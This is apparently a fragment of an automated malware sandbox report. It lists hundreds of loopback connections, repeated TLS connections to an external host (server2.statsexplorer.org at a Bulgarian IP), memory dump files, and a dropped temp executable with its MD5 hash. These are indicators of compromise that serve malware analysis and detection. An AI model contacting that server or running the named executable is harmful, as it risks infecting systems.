N/A 127.0.0.1:54725 tcp
N/A 127.0.0.1:54728 tcp
N/A 127.0.0.1:54732 tcp
N/A 127.0.0.1:54737 tcp
N/A 127.0.0.1:54741 tcp
N/A 127.0.0.1:54746 tcp
N/A 127.0.0.1:54754 tcp
N/A 127.0.0.1:54757 tcp
N/A 127.0.0.1:54762 tcp
N/A 127.0.0.1:54767 tcp
N/A 127.0.0.1:54772 tcp
N/A 127.0.0.1:54780 tcp
N/A 127.0.0.1:54786 tcp
N/A 127.0.0.1:54790 tcp
N/A 127.0.0.1:54792 tcp
N/A 127.0.0.1:54798 tcp
N/A 127.0.0.1:54801 tcp
N/A 127.0.0.1:54804 tcp
N/A 127.0.0.1:54807 tcp
N/A 127.0.0.1:54810 tcp
N/A 127.0.0.1:54814 tcp
N/A 127.0.0.1:54817 tcp
N/A 127.0.0.1:54821 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:54833 tcp
N/A 127.0.0.1:54838 tcp
N/A 127.0.0.1:54843 tcp
N/A 127.0.0.1:54849 tcp
N/A 127.0.0.1:54853 tcp
N/A 127.0.0.1:54852 tcp
N/A 127.0.0.1:54858 tcp
N/A 127.0.0.1:54866 tcp
N/A 127.0.0.1:54872 tcp
N/A 127.0.0.1:54874 tcp
N/A 127.0.0.1:54879 tcp
N/A 127.0.0.1:54885 tcp
N/A 127.0.0.1:54888 tcp
N/A 127.0.0.1:54890 tcp
N/A 127.0.0.1:54898 tcp
N/A 127.0.0.1:54906 tcp
N/A 127.0.0.1:54908 tcp
N/A 127.0.0.1:54912 tcp
N/A 127.0.0.1:54921 tcp
N/A 127.0.0.1:54924 tcp
N/A 127.0.0.1:54928 tcp
N/A 127.0.0.1:54933 tcp
N/A 127.0.0.1:54937 tcp
N/A 127.0.0.1:54941 tcp
N/A 127.0.0.1:54945 tcp
N/A 127.0.0.1:54955 tcp
N/A 127.0.0.1:54960 tcp
N/A 127.0.0.1:54962 tcp
N/A 127.0.0.1:54965 tcp
N/A 127.0.0.1:54970 tcp
N/A 127.0.0.1:54976 tcp
N/A 127.0.0.1:54978 tcp
N/A 127.0.0.1:54982 tcp
N/A 127.0.0.1:54985 tcp
N/A 127.0.0.1:54994 tcp
N/A 127.0.0.1:54998 tcp
N/A 127.0.0.1:55002 tcp
N/A 127.0.0.1:55006 tcp
N/A 127.0.0.1:55008 tcp
N/A 127.0.0.1:55011 tcp
N/A 127.0.0.1:55015 tcp
N/A 127.0.0.1:55019 tcp
N/A 127.0.0.1:55028 tcp
N/A 127.0.0.1:55030 tcp
N/A 127.0.0.1:55038 tcp
N/A 127.0.0.1:55040 tcp
N/A 127.0.0.1:55045 tcp
N/A 127.0.0.1:55049 tcp
N/A 127.0.0.1:55052 tcp
N/A 127.0.0.1:55055 tcp
N/A 127.0.0.1:55058 tcp
N/A 127.0.0.1:55067 tcp
N/A 127.0.0.1:55069 tcp
N/A 127.0.0.1:55073 tcp
N/A 127.0.0.1:55080 tcp
N/A 127.0.0.1:55083 tcp
N/A 127.0.0.1:55086 tcp
N/A 127.0.0.1:55089 tcp
N/A 127.0.0.1:55093 tcp
N/A 127.0.0.1:55101 tcp
N/A 127.0.0.1:55103 tcp
N/A 127.0.0.1:55110 tcp
N/A 127.0.0.1:55113 tcp
N/A 127.0.0.1:55119 tcp
N/A 127.0.0.1:55123 tcp
N/A 127.0.0.1:55126 tcp
N/A 127.0.0.1:55130 tcp
N/A 127.0.0.1:55140 tcp
N/A 127.0.0.1:55142 tcp
N/A 127.0.0.1:55146 tcp
N/A 127.0.0.1:55153 tcp
N/A 127.0.0.1:55158 tcp
N/A 127.0.0.1:55163 tcp
N/A 127.0.0.1:55171 tcp
N/A 127.0.0.1:55174 tcp
N/A 127.0.0.1:55181 tcp
N/A 127.0.0.1:55184 tcp
N/A 127.0.0.1:55188 tcp
N/A 127.0.0.1:55191 tcp
N/A 127.0.0.1:55193 tcp
N/A 127.0.0.1:55195 tcp
N/A 127.0.0.1:55199 tcp
N/A 127.0.0.1:55207 tcp
N/A 127.0.0.1:55212 tcp
N/A 127.0.0.1:55214 tcp
N/A 127.0.0.1:55225 tcp
N/A 127.0.0.1:55227 tcp
N/A 127.0.0.1:55231 tcp
N/A 127.0.0.1:55236 tcp
N/A 127.0.0.1:55242 tcp
N/A 127.0.0.1:55246 tcp
N/A 127.0.0.1:55249 tcp
N/A 127.0.0.1:55254 tcp
N/A 127.0.0.1:55256 tcp
N/A 127.0.0.1:55259 tcp
N/A 127.0.0.1:55262 tcp
N/A 127.0.0.1:55266 tcp
N/A 127.0.0.1:55271 tcp
N/A 127.0.0.1:55276 tcp
N/A 127.0.0.1:55281 tcp
N/A 127.0.0.1:55289 tcp
N/A 127.0.0.1:55291 tcp
N/A 127.0.0.1:55301 tcp
N/A 127.0.0.1:55303 tcp
N/A 127.0.0.1:55308 tcp
N/A 127.0.0.1:55312 tcp
N/A 127.0.0.1:55315 tcp
N/A 127.0.0.1:55319 tcp
N/A 127.0.0.1:55322 tcp
N/A 127.0.0.1:55325 tcp
N/A 127.0.0.1:55327 tcp
N/A 127.0.0.1:55333 tcp
N/A 127.0.0.1:55337 tcp
N/A 127.0.0.1:55342 tcp
N/A 127.0.0.1:55347 tcp
N/A 127.0.0.1:55355 tcp
N/A 127.0.0.1:55358 tcp
N/A 127.0.0.1:55360 tcp
N/A 127.0.0.1:55365 tcp
N/A 127.0.0.1:55369 tcp
N/A 127.0.0.1:55374 tcp
N/A 127.0.0.1:55381 tcp
N/A 127.0.0.1:55387 tcp
N/A 127.0.0.1:55389 tcp
N/A 127.0.0.1:55393 tcp
N/A 127.0.0.1:55399 tcp
N/A 127.0.0.1:55407 tcp
N/A 127.0.0.1:55411 tcp
N/A 127.0.0.1:55416 tcp
N/A 127.0.0.1:55420 tcp
N/A 127.0.0.1:55429 tcp
N/A 127.0.0.1:55431 tcp
N/A 127.0.0.1:55434 tcp
N/A 127.0.0.1:55442 tcp
N/A 127.0.0.1:55446 tcp
N/A 127.0.0.1:55448 tcp
N/A 127.0.0.1:55451 tcp
N/A 127.0.0.1:55453 tcp
N/A 127.0.0.1:55456 tcp
N/A 127.0.0.1:55461 tcp
N/A 127.0.0.1:55464 tcp
N/A 127.0.0.1:55470 tcp
N/A 127.0.0.1:55476 tcp
N/A 127.0.0.1:55478 tcp
N/A 127.0.0.1:55480 tcp
N/A 127.0.0.1:55487 tcp
N/A 127.0.0.1:55491 tcp
N/A 127.0.0.1:55494 tcp
N/A 127.0.0.1:55497 tcp
N/A 127.0.0.1:55500 tcp
N/A 127.0.0.1:55504 tcp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
N/A 127.0.0.1:55511 tcp
N/A 127.0.0.1:55514 tcp
N/A 127.0.0.1:55516 tcp
N/A 127.0.0.1:55521 tcp
N/A 127.0.0.1:55525 tcp
N/A 127.0.0.1:55529 tcp
N/A 127.0.0.1:55531 tcp
N/A 127.0.0.1:55535 tcp
N/A 127.0.0.1:55537 tcp
N/A 127.0.0.1:55546 tcp
N/A 127.0.0.1:55548 tcp
N/A 127.0.0.1:55552 tcp
N/A 127.0.0.1:55558 tcp
N/A 127.0.0.1:55563 tcp
N/A 127.0.0.1:55566 tcp
N/A 127.0.0.1:55571 tcp
N/A 127.0.0.1:55575 tcp
N/A 127.0.0.1:55577 tcp
N/A 127.0.0.1:55581 tcp
N/A 127.0.0.1:55584 tcp
N/A 127.0.0.1:55587 tcp
N/A 127.0.0.1:55590 tcp
N/A 127.0.0.1:55594 tcp
N/A 127.0.0.1:55597 tcp
N/A 127.0.0.1:55604 tcp
N/A 127.0.0.1:55609 tcp
N/A 127.0.0.1:55613 tcp
N/A 127.0.0.1:55616 tcp
N/A 127.0.0.1:55619 tcp
N/A 127.0.0.1:55622 tcp
N/A 127.0.0.1:55626 tcp
N/A 127.0.0.1:55630 tcp
N/A 127.0.0.1:55635 tcp
N/A 127.0.0.1:55640 tcp
N/A 127.0.0.1:55643 tcp
N/A 127.0.0.1:55648 tcp
N/A 127.0.0.1:55651 tcp
N/A 127.0.0.1:55654 tcp
N/A 127.0.0.1:55656 tcp
N/A 127.0.0.1:55661 tcp
N/A 127.0.0.1:55665 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:55671 tcp
N/A 127.0.0.1:55674 tcp
N/A 127.0.0.1:55683 tcp
N/A 127.0.0.1:55688 tcp
N/A 127.0.0.1:55693 tcp
N/A 127.0.0.1:55696 tcp
N/A 127.0.0.1:55700 tcp
N/A 127.0.0.1:55702 tcp
N/A 127.0.0.1:55705 tcp
N/A 127.0.0.1:55716 tcp
N/A 127.0.0.1:55718 tcp
N/A 127.0.0.1:55721 tcp
N/A 127.0.0.1:55726 tcp
N/A 127.0.0.1:55735 tcp
N/A 127.0.0.1:55737 tcp
N/A 127.0.0.1:55742 tcp
N/A 127.0.0.1:55747 tcp
N/A 127.0.0.1:55750 tcp
N/A 127.0.0.1:55753 tcp
N/A 127.0.0.1:55758 tcp
N/A 127.0.0.1:55761 tcp
N/A 127.0.0.1:55765 tcp
N/A 127.0.0.1:55774 tcp
N/A 127.0.0.1:55779 tcp
N/A 127.0.0.1:55782 tcp
N/A 127.0.0.1:55785 tcp
N/A 127.0.0.1:55787 tcp
N/A 127.0.0.1:55790 tcp
N/A 127.0.0.1:55794 tcp
N/A 127.0.0.1:55803 tcp
N/A 127.0.0.1:55808 tcp
N/A 127.0.0.1:55811 tcp
N/A 127.0.0.1:55815 tcp
N/A 127.0.0.1:55819 tcp
N/A 127.0.0.1:55823 tcp
N/A 127.0.0.1:55828 tcp
N/A 127.0.0.1:55834 tcp
N/A 127.0.0.1:55837 tcp
N/A 127.0.0.1:55841 tcp
N/A 127.0.0.1:55847 tcp
N/A 127.0.0.1:55851 tcp
N/A 127.0.0.1:55854 tcp
N/A 127.0.0.1:55856 tcp
N/A 127.0.0.1:55862 tcp
N/A 127.0.0.1:55870 tcp
N/A 127.0.0.1:55872 tcp
N/A 127.0.0.1:55875 tcp
N/A 127.0.0.1:55884 tcp
N/A 127.0.0.1:55886 tcp
N/A 127.0.0.1:55891 tcp
N/A 127.0.0.1:55896 tcp
N/A 127.0.0.1:55899 tcp
N/A 127.0.0.1:55902 tcp
N/A 127.0.0.1:55907 tcp
N/A 127.0.0.1:55910 tcp
N/A 127.0.0.1:55915 tcp
N/A 127.0.0.1:55919 tcp
N/A 127.0.0.1:55929 tcp
N/A 127.0.0.1:55931 tcp
N/A 127.0.0.1:55934 tcp
N/A 127.0.0.1:55942 tcp
N/A 127.0.0.1:55945 tcp
N/A 127.0.0.1:55949 tcp
N/A 127.0.0.1:55951 tcp
N/A 127.0.0.1:55957 tcp
N/A 127.0.0.1:55960 tcp
N/A 127.0.0.1:55963 tcp
N/A 127.0.0.1:55967 tcp
N/A 127.0.0.1:55969 tcp
N/A 127.0.0.1:55972 tcp
N/A 127.0.0.1:55983 tcp
N/A 127.0.0.1:55985 tcp
N/A 127.0.0.1:55991 tcp
N/A 127.0.0.1:55995 tcp
N/A 127.0.0.1:56000 tcp
N/A 127.0.0.1:56004 tcp
N/A 127.0.0.1:56011 tcp
N/A 127.0.0.1:56015 tcp
N/A 127.0.0.1:56021 tcp
N/A 127.0.0.1:56025 tcp
N/A 127.0.0.1:56030 tcp
N/A 127.0.0.1:56033 tcp
N/A 127.0.0.1:56036 tcp
N/A 127.0.0.1:56040 tcp
N/A 127.0.0.1:56044 tcp
N/A 127.0.0.1:56049 tcp
N/A 127.0.0.1:56054 tcp
N/A 127.0.0.1:56059 tcp
N/A 127.0.0.1:56061 tcp
N/A 127.0.0.1:56065 tcp
N/A 127.0.0.1:56069 tcp
N/A 127.0.0.1:56074 tcp
N/A 127.0.0.1:56080 tcp
N/A 127.0.0.1:56082 tcp
N/A 127.0.0.1:56086 tcp
N/A 127.0.0.1:56090 tcp
N/A 127.0.0.1:56094 tcp
N/A 127.0.0.1:56098 tcp
N/A 127.0.0.1:56104 tcp
N/A 127.0.0.1:56108 tcp
N/A 127.0.0.1:56114 tcp
N/A 127.0.0.1:56120 tcp
N/A 127.0.0.1:56123 tcp
N/A 127.0.0.1:56128 tcp
N/A 127.0.0.1:56133 tcp
N/A 127.0.0.1:56136 tcp
N/A 127.0.0.1:56138 tcp
N/A 127.0.0.1:56141 tcp
N/A 127.0.0.1:56145 tcp
N/A 127.0.0.1:56155 tcp
N/A 127.0.0.1:56157 tcp
N/A 127.0.0.1:56162 tcp
N/A 127.0.0.1:56166 tcp
N/A 127.0.0.1:56170 tcp
N/A 127.0.0.1:56174 tcp
N/A 127.0.0.1:56181 tcp
N/A 127.0.0.1:56184 tcp
N/A 127.0.0.1:56188 tcp
N/A 127.0.0.1:56192 tcp
N/A 127.0.0.1:56195 tcp
N/A 127.0.0.1:56203 tcp
N/A 127.0.0.1:56208 tcp
N/A 127.0.0.1:56211 tcp
N/A 127.0.0.1:56212 tcp
N/A 127.0.0.1:56216 tcp
N/A 127.0.0.1:56223 tcp
N/A 127.0.0.1:56229 tcp
N/A 127.0.0.1:56233 tcp
N/A 127.0.0.1:56237 tcp
N/A 127.0.0.1:56241 tcp
N/A 127.0.0.1:56246 tcp
N/A 127.0.0.1:56250 tcp
N/A 127.0.0.1:56253 tcp
N/A 127.0.0.1:56258 tcp
N/A 127.0.0.1:56261 tcp
N/A 127.0.0.1:56266 tcp
N/A 127.0.0.1:56272 tcp
N/A 127.0.0.1:56276 tcp
N/A 127.0.0.1:56279 tcp
N/A 127.0.0.1:56286 tcp
N/A 127.0.0.1:56289 tcp
N/A 127.0.0.1:56298 tcp
N/A 127.0.0.1:56300 tcp
N/A 127.0.0.1:56303 tcp
N/A 127.0.0.1:56305 tcp
N/A 127.0.0.1:56309 tcp
N/A 127.0.0.1:56312 tcp
N/A 127.0.0.1:56317 tcp
N/A 127.0.0.1:56324 tcp
N/A 127.0.0.1:56328 tcp
N/A 127.0.0.1:56332 tcp
N/A 127.0.0.1:56335 tcp
N/A 127.0.0.1:56338 tcp
N/A 127.0.0.1:56341 tcp
N/A 127.0.0.1:56344 tcp
N/A 127.0.0.1:56349 tcp
N/A 127.0.0.1:56353 tcp
N/A 127.0.0.1:56359 tcp
N/A 127.0.0.1:56365 tcp
N/A 127.0.0.1:56369 tcp
N/A 127.0.0.1:56374 tcp
N/A 127.0.0.1:56379 tcp
N/A 127.0.0.1:56383 tcp
N/A 127.0.0.1:56389 tcp
N/A 127.0.0.1:56394 tcp
N/A 127.0.0.1:56396 tcp
N/A 127.0.0.1:56400 tcp
N/A 127.0.0.1:56403 tcp
N/A 127.0.0.1:56407 tcp
N/A 127.0.0.1:56411 tcp
N/A 127.0.0.1:56421 tcp
N/A 127.0.0.1:56423 tcp
N/A 127.0.0.1:56431 tcp
N/A 127.0.0.1:56433 tcp
N/A 127.0.0.1:56436 tcp
N/A 127.0.0.1:56439 tcp
N/A 127.0.0.1:56441 tcp
N/A 127.0.0.1:56446 tcp
N/A 127.0.0.1:56451 tcp
N/A 127.0.0.1:56458 tcp
N/A 127.0.0.1:56463 tcp
N/A 127.0.0.1:56467 tcp
N/A 127.0.0.1:56471 tcp
N/A 127.0.0.1:56475 tcp
N/A 127.0.0.1:56479 tcp
N/A 127.0.0.1:56485 tcp
N/A 127.0.0.1:56488 tcp
N/A 127.0.0.1:56491 tcp
N/A 127.0.0.1:56496 tcp
N/A 127.0.0.1:56499 tcp
N/A 127.0.0.1:56504 tcp
N/A 127.0.0.1:56509 tcp
N/A 127.0.0.1:56514 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:56521 tcp
N/A 127.0.0.1:56524 tcp
N/A 127.0.0.1:56534 tcp
N/A 127.0.0.1:56536 tcp
N/A 127.0.0.1:56540 tcp
N/A 127.0.0.1:56545 tcp
N/A 127.0.0.1:56548 tcp
N/A 127.0.0.1:56551 tcp
N/A 127.0.0.1:56558 tcp
N/A 127.0.0.1:56562 tcp
N/A 127.0.0.1:56565 tcp
N/A 127.0.0.1:56568 tcp
N/A 127.0.0.1:56570 tcp
N/A 127.0.0.1:56572 tcp
N/A 127.0.0.1:56576 tcp
N/A 127.0.0.1:56589 tcp
N/A 127.0.0.1:56591 tcp
N/A 127.0.0.1:56593 tcp
N/A 127.0.0.1:56598 tcp
N/A 127.0.0.1:56603 tcp
N/A 127.0.0.1:56607 tcp
N/A 127.0.0.1:56610 tcp
N/A 127.0.0.1:56613 tcp
N/A 127.0.0.1:56623 tcp
N/A 127.0.0.1:56626 tcp
N/A 127.0.0.1:56631 tcp
N/A 127.0.0.1:56635 tcp
N/A 127.0.0.1:56638 tcp
N/A 127.0.0.1:56642 tcp
N/A 127.0.0.1:56646 tcp
N/A 127.0.0.1:56650 tcp
N/A 127.0.0.1:56657 tcp
N/A 127.0.0.1:56661 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56670 tcp
N/A 127.0.0.1:56677 tcp
N/A 127.0.0.1:56679 tcp
N/A 127.0.0.1:56685 tcp
N/A 127.0.0.1:56688 tcp
N/A 127.0.0.1:56690 tcp
N/A 127.0.0.1:56693 tcp
N/A 127.0.0.1:56695 tcp
N/A 127.0.0.1:56706 tcp
N/A 127.0.0.1:56712 tcp
N/A 127.0.0.1:56717 tcp
N/A 127.0.0.1:56720 tcp
N/A 127.0.0.1:56726 tcp
N/A 127.0.0.1:56729 tcp
N/A 127.0.0.1:56733 tcp
N/A 127.0.0.1:56741 tcp
N/A 127.0.0.1:56744 tcp
N/A 127.0.0.1:56747 tcp
N/A 127.0.0.1:56751 tcp
N/A 127.0.0.1:56754 tcp
N/A 127.0.0.1:56756 tcp
N/A 127.0.0.1:56758 tcp
N/A 127.0.0.1:56760 tcp
N/A 127.0.0.1:56762 tcp
N/A 127.0.0.1:56764 tcp
N/A 127.0.0.1:56766 tcp
N/A 127.0.0.1:56768 tcp
N/A 127.0.0.1:56770 tcp
N/A 127.0.0.1:56772 tcp
N/A 127.0.0.1:56774 tcp
N/A 127.0.0.1:56776 tcp
N/A 127.0.0.1:56778 tcp
N/A 127.0.0.1:56780 tcp
N/A 127.0.0.1:56782 tcp
N/A 127.0.0.1:56784 tcp
N/A 127.0.0.1:56786 tcp
N/A 127.0.0.1:56788 tcp
N/A 127.0.0.1:56790 tcp
N/A 127.0.0.1:56792 tcp
N/A 127.0.0.1:56794 tcp
N/A 127.0.0.1:56796 tcp
N/A 127.0.0.1:56798 tcp
N/A 127.0.0.1:56800 tcp
N/A 127.0.0.1:56802 tcp
N/A 127.0.0.1:56804 tcp
N/A 127.0.0.1:56806 tcp
N/A 127.0.0.1:56808 tcp
N/A 127.0.0.1:56810 tcp
N/A 127.0.0.1:56812 tcp
N/A 127.0.0.1:56814 tcp
N/A 127.0.0.1:56816 tcp
N/A 127.0.0.1:56818 tcp
N/A 127.0.0.1:56820 tcp
N/A 127.0.0.1:56822 tcp
N/A 127.0.0.1:56824 tcp
N/A 127.0.0.1:56826 tcp
N/A 127.0.0.1:56828 tcp
N/A 127.0.0.1:56830 tcp
N/A 127.0.0.1:56832 tcp
N/A 127.0.0.1:56834 tcp
N/A 127.0.0.1:56836 tcp
N/A 127.0.0.1:56838 tcp
N/A 127.0.0.1:56840 tcp
N/A 127.0.0.1:56842 tcp
N/A 127.0.0.1:56844 tcp
N/A 127.0.0.1:56846 tcp
N/A 127.0.0.1:56848 tcp
N/A 127.0.0.1:56850 tcp
N/A 127.0.0.1:56852 tcp
N/A 127.0.0.1:56854 tcp
N/A 127.0.0.1:56856 tcp
N/A 127.0.0.1:56858 tcp
N/A 127.0.0.1:56860 tcp
N/A 127.0.0.1:56862 tcp
N/A 127.0.0.1:56864 tcp
N/A 127.0.0.1:56866 tcp
N/A 127.0.0.1:56868 tcp
N/A 127.0.0.1:56870 tcp
N/A 127.0.0.1:56872 tcp
N/A 127.0.0.1:56875 tcp
N/A 127.0.0.1:56877 tcp
N/A 127.0.0.1:56879 tcp
N/A 127.0.0.1:56881 tcp
N/A 127.0.0.1:56883 tcp
N/A 127.0.0.1:56885 tcp
N/A 127.0.0.1:56887 tcp
N/A 127.0.0.1:56889 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:56896 tcp
N/A 127.0.0.1:56902 tcp
N/A 127.0.0.1:56906 tcp
N/A 127.0.0.1:56909 tcp
N/A 127.0.0.1:56913 tcp
N/A 127.0.0.1:56922 tcp
N/A 127.0.0.1:56930 tcp
N/A 127.0.0.1:56933 tcp
N/A 127.0.0.1:56940 tcp
N/A 127.0.0.1:56945 tcp
N/A 127.0.0.1:56949 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:56955 tcp
N/A 127.0.0.1:56957 tcp
N/A 127.0.0.1:56959 tcp
N/A 127.0.0.1:56961 tcp
N/A 127.0.0.1:56963 tcp
N/A 127.0.0.1:56965 tcp
N/A 127.0.0.1:56967 tcp
N/A 127.0.0.1:56983 tcp
N/A 127.0.0.1:56986 tcp
N/A 127.0.0.1:56988 tcp
N/A 127.0.0.1:56990 tcp
N/A 127.0.0.1:56992 tcp
N/A 127.0.0.1:56994 tcp
N/A 127.0.0.1:56996 tcp
N/A 127.0.0.1:56998 tcp
N/A 127.0.0.1:57000 tcp
N/A 127.0.0.1:57002 tcp
N/A 127.0.0.1:57004 tcp
N/A 127.0.0.1:57006 tcp
N/A 127.0.0.1:57008 tcp
N/A 127.0.0.1:57010 tcp
N/A 127.0.0.1:57012 tcp
N/A 127.0.0.1:57014 tcp
N/A 127.0.0.1:57016 tcp
N/A 127.0.0.1:57018 tcp
N/A 127.0.0.1:57020 tcp
N/A 127.0.0.1:57022 tcp
N/A 127.0.0.1:57024 tcp
N/A 127.0.0.1:57026 tcp
N/A 127.0.0.1:57028 tcp
N/A 127.0.0.1:57030 tcp
N/A 127.0.0.1:57032 tcp
N/A 127.0.0.1:57034 tcp
N/A 127.0.0.1:57036 tcp
N/A 127.0.0.1:57038 tcp
N/A 127.0.0.1:57040 tcp
N/A 127.0.0.1:57042 tcp
N/A 127.0.0.1:57044 tcp
N/A 127.0.0.1:57046 tcp
N/A 127.0.0.1:57052 tcp
N/A 127.0.0.1:57054 tcp
N/A 127.0.0.1:57056 tcp
N/A 127.0.0.1:57058 tcp
N/A 127.0.0.1:57060 tcp
N/A 127.0.0.1:57062 tcp
N/A 127.0.0.1:57066 tcp
N/A 127.0.0.1:57068 tcp
N/A 127.0.0.1:57070 tcp
N/A 127.0.0.1:57072 tcp
N/A 127.0.0.1:57074 tcp
N/A 127.0.0.1:57076 tcp
N/A 127.0.0.1:57078 tcp
N/A 127.0.0.1:57080 tcp
N/A 127.0.0.1:57082 tcp
N/A 127.0.0.1:57084 tcp
N/A 127.0.0.1:57086 tcp
N/A 127.0.0.1:57088 tcp
N/A 127.0.0.1:57090 tcp
N/A 127.0.0.1:57092 tcp
N/A 127.0.0.1:57094 tcp
N/A 127.0.0.1:57096 tcp
N/A 127.0.0.1:57098 tcp
N/A 127.0.0.1:57100 tcp
N/A 127.0.0.1:57102 tcp
N/A 127.0.0.1:57104 tcp
N/A 127.0.0.1:57106 tcp
N/A 127.0.0.1:57108 tcp
N/A 127.0.0.1:57110 tcp
N/A 127.0.0.1:57112 tcp
N/A 127.0.0.1:57114 tcp
N/A 127.0.0.1:57116 tcp
N/A 127.0.0.1:57118 tcp
N/A 127.0.0.1:57120 tcp
N/A 127.0.0.1:57122 tcp
N/A 127.0.0.1:57124 tcp
N/A 127.0.0.1:57126 tcp
N/A 127.0.0.1:57128 tcp
N/A 127.0.0.1:57130 tcp
N/A 127.0.0.1:57132 tcp
N/A 127.0.0.1:57134 tcp
N/A 127.0.0.1:57136 tcp
N/A 127.0.0.1:57138 tcp
N/A 127.0.0.1:57140 tcp
N/A 127.0.0.1:57142 tcp
N/A 127.0.0.1:57144 tcp
N/A 127.0.0.1:57146 tcp
N/A 127.0.0.1:57148 tcp
N/A 127.0.0.1:57150 tcp
N/A 127.0.0.1:57152 tcp
N/A 127.0.0.1:57154 tcp
N/A 127.0.0.1:57156 tcp
N/A 127.0.0.1:57158 tcp
N/A 127.0.0.1:57160 tcp
N/A 127.0.0.1:57162 tcp
N/A 127.0.0.1:57164 tcp
N/A 127.0.0.1:57166 tcp
N/A 127.0.0.1:57168 tcp
N/A 127.0.0.1:57170 tcp
N/A 127.0.0.1:57172 tcp
N/A 127.0.0.1:57174 tcp
N/A 127.0.0.1:57176 tcp
N/A 127.0.0.1:57178 tcp
N/A 127.0.0.1:57180 tcp
N/A 127.0.0.1:57182 tcp
N/A 127.0.0.1:57184 tcp
N/A 127.0.0.1:57187 tcp
N/A 127.0.0.1:57192 tcp
N/A 127.0.0.1:57197 tcp
N/A 127.0.0.1:57200 tcp
N/A 127.0.0.1:57209 tcp
N/A 127.0.0.1:57211 tcp
N/A 127.0.0.1:57213 tcp
N/A 127.0.0.1:57215 tcp
N/A 127.0.0.1:57217 tcp
N/A 127.0.0.1:57219 tcp
N/A 127.0.0.1:57221 tcp
N/A 127.0.0.1:57223 tcp
N/A 127.0.0.1:57225 tcp
N/A 127.0.0.1:57227 tcp
N/A 127.0.0.1:57229 tcp
N/A 127.0.0.1:57231 tcp
N/A 127.0.0.1:57233 tcp
N/A 127.0.0.1:57235 tcp
N/A 127.0.0.1:57237 tcp
N/A 127.0.0.1:57239 tcp
N/A 127.0.0.1:57241 tcp
N/A 127.0.0.1:57243 tcp
N/A 127.0.0.1:57245 tcp
N/A 127.0.0.1:57247 tcp
N/A 127.0.0.1:57249 tcp
N/A 127.0.0.1:57251 tcp
N/A 127.0.0.1:57253 tcp
N/A 127.0.0.1:57255 tcp
N/A 127.0.0.1:57257 tcp
N/A 127.0.0.1:57259 tcp
N/A 127.0.0.1:57261 tcp
N/A 127.0.0.1:57263 tcp
N/A 127.0.0.1:57265 tcp
N/A 127.0.0.1:57267 tcp
N/A 127.0.0.1:57269 tcp
N/A 127.0.0.1:57273 tcp
N/A 127.0.0.1:57277 tcp
N/A 127.0.0.1:57279 tcp
N/A 127.0.0.1:57281 tcp
N/A 127.0.0.1:57283 tcp
N/A 127.0.0.1:57285 tcp
N/A 127.0.0.1:57287 tcp
N/A 127.0.0.1:57289 tcp
N/A 127.0.0.1:57291 tcp
N/A 127.0.0.1:57293 tcp
N/A 127.0.0.1:57295 tcp
N/A 127.0.0.1:57297 tcp
N/A 127.0.0.1:57299 tcp
N/A 127.0.0.1:57301 tcp
N/A 127.0.0.1:57309 tcp
N/A 127.0.0.1:57315 tcp
N/A 127.0.0.1:57317 tcp
N/A 127.0.0.1:57319 tcp
N/A 127.0.0.1:57329 tcp
N/A 127.0.0.1:57331 tcp
N/A 127.0.0.1:57334 tcp
N/A 127.0.0.1:57340 tcp
N/A 127.0.0.1:57345 tcp
N/A 127.0.0.1:57348 tcp
N/A 127.0.0.1:57350 tcp
N/A 127.0.0.1:57352 tcp
N/A 127.0.0.1:57354 tcp
N/A 127.0.0.1:57356 tcp
N/A 127.0.0.1:57358 tcp
N/A 127.0.0.1:57360 tcp
N/A 127.0.0.1:57367 tcp
N/A 127.0.0.1:57370 tcp
N/A 127.0.0.1:57372 tcp
N/A 127.0.0.1:57378 tcp
N/A 127.0.0.1:57381 tcp
N/A 127.0.0.1:57385 tcp
N/A 127.0.0.1:57393 tcp
N/A 127.0.0.1:57396 tcp
N/A 127.0.0.1:57402 tcp
N/A 127.0.0.1:57405 tcp
N/A 127.0.0.1:57409 tcp
N/A 127.0.0.1:57412 tcp
N/A 127.0.0.1:57414 tcp
N/A 127.0.0.1:57416 tcp
N/A 127.0.0.1:57418 tcp
N/A 127.0.0.1:57425 tcp
N/A 127.0.0.1:57427 tcp
N/A 127.0.0.1:57429 tcp
N/A 127.0.0.1:57436 tcp
N/A 127.0.0.1:57438 tcp
N/A 127.0.0.1:57440 tcp
N/A 127.0.0.1:57442 tcp
N/A 127.0.0.1:57444 tcp
N/A 127.0.0.1:57446 tcp
N/A 127.0.0.1:57448 tcp
N/A 127.0.0.1:57450 tcp
N/A 127.0.0.1:57452 tcp
N/A 127.0.0.1:57454 tcp
N/A 127.0.0.1:57456 tcp
N/A 127.0.0.1:57458 tcp
N/A 127.0.0.1:57460 tcp
N/A 127.0.0.1:57462 tcp
N/A 127.0.0.1:57464 tcp
N/A 127.0.0.1:57466 tcp
N/A 127.0.0.1:57468 tcp
N/A 127.0.0.1:57470 tcp
N/A 127.0.0.1:57472 tcp
N/A 127.0.0.1:57474 tcp
N/A 127.0.0.1:57476 tcp
N/A 127.0.0.1:57478 tcp
N/A 127.0.0.1:57480 tcp
N/A 127.0.0.1:57484 tcp
N/A 127.0.0.1:57486 tcp
N/A 127.0.0.1:57491 tcp
N/A 127.0.0.1:57494 tcp
N/A 127.0.0.1:57501 tcp
N/A 127.0.0.1:57503 tcp
N/A 127.0.0.1:57505 tcp
N/A 127.0.0.1:57507 tcp
N/A 127.0.0.1:57509 tcp
N/A 127.0.0.1:57515 tcp
N/A 127.0.0.1:57517 tcp
N/A 127.0.0.1:57520 tcp
N/A 127.0.0.1:57526 tcp
N/A 127.0.0.1:57529 tcp
N/A 127.0.0.1:57533 tcp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
BG 185.82.216.108:443 server2.statsexplorer.org tcp

Files

memory/4972-1-0x00000000024D0000-0x00000000025D0000-memory.dmp

memory/4972-2-0x00000000022F0000-0x00000000022FB000-memory.dmp

memory/4972-3-0x0000000000400000-0x00000000022CB000-memory.dmp

memory/3284-4-0x0000000001200000-0x0000000001216000-memory.dmp

memory/4972-5-0x0000000000400000-0x00000000022CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C12D.exe

MD5 147f5f5bbc80b2ad753993e15f3f32c2
